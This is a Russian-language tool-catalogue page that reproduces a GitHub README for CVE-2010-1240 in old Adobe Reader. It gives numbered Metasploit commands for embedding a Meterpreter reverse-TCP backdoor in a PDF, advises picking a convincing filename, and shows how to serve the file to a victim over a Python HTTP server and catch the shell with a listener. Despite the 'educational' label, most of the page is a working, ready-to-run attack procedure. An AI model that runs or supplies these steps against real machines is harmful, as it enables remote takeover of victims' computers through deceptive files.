Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2010-1240 — Образовательный proof-of-concept, демонстрирующий, как внедрить бэкдор Meterpreter в PDF-файл с использованием уязвимости CVE-2010-1240, с пошаговыми инструкциями по Metasploit для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/asepsaepdin/cve-2010-1240
Инструменты фишингаФреймворки для эксплойтовЭксплуатация веб-приложенийТестирование на ПроникновениеСоциальная инженерияРазработка Полезной Нагрузки
GitHubasepsaepdin/cve-2010-1240

CVE-2010-1240

Образовательный proof-of-concept, демонстрирующий, как внедрить бэкдор Meterpreter в PDF-файл с использованием уязвимости CVE-2010-1240, с пошаговыми инструкциями по Metasploit для авторизованного тестирования безопасности.

Репозиторий
11613 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2010-1240 - Внедрение бэкдора в PDF

Python


⚠️ Только для образовательных и авторизованных исследовательских целей в области безопасности

Описание

Adobe Reader и Acrobat 9.x до 9.3.3, а также 8.x до 8.2.3 в Windows и Mac OS X не ограничивают содержимое одного текстового поля в диалоговом окне предупреждения Launch File, что облегчает удаленным злоумышленникам обманом заставить пользователей выполнить произвольную локальную программу, указанную в PDF-документе, как показано на примере текстового поля, утверждающего, что кнопка Open позволит пользователю прочитать зашифрованное сообщение.

Демонстрация

Анимация

Пошаговые инструкции

  1. Сначала запустите msfconsole

    msfconsole
    
  2. Затем установите полезную нагрузку для внедрения в PDF

    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    
  3. Установите параметр INFILENAME и укажите прямой путь к исходному PDF-файлу

    set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
    
  4. Задайте имя новому вредоносному PDF-файлу, чтобы оно выглядело убедительнее, установив параметр FILENAME

    set FILENAME laporan.pdf
    
  5. Найдите и внедрите полезную нагрузку в PDF-файл

    set payload windows/meterpreter/reverse_tcp
    
  6. Установите параметр LHOST на IP-адрес атакующего

    set LHOST 172.16.10.10
    
  7. Откройте новый терминал и перейдите в папку с вредоносным PDF-файлом

    cd .msf4/local/
    
  8. Создайте временный сервер на Python

    python -m http.server
    
  9. Загрузите вредоносный PDF-файл на машину жертвы

    http://172.16.10.10:8000/certificate.pdf
    
  10. Перед запуском вредоносного PDF-файла на машине жертвы запустите слушатель в предыдущем терминале

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.10.10
    exploit
    
  11. Как только вредоносный PDF-файл будет выполнен на машине жертвы, вы получите подключение к машине жертвы

Благодарности

  • https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  • https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  • https://github.com/Jasmoon99/Embedded-PDF
Скачать инструмент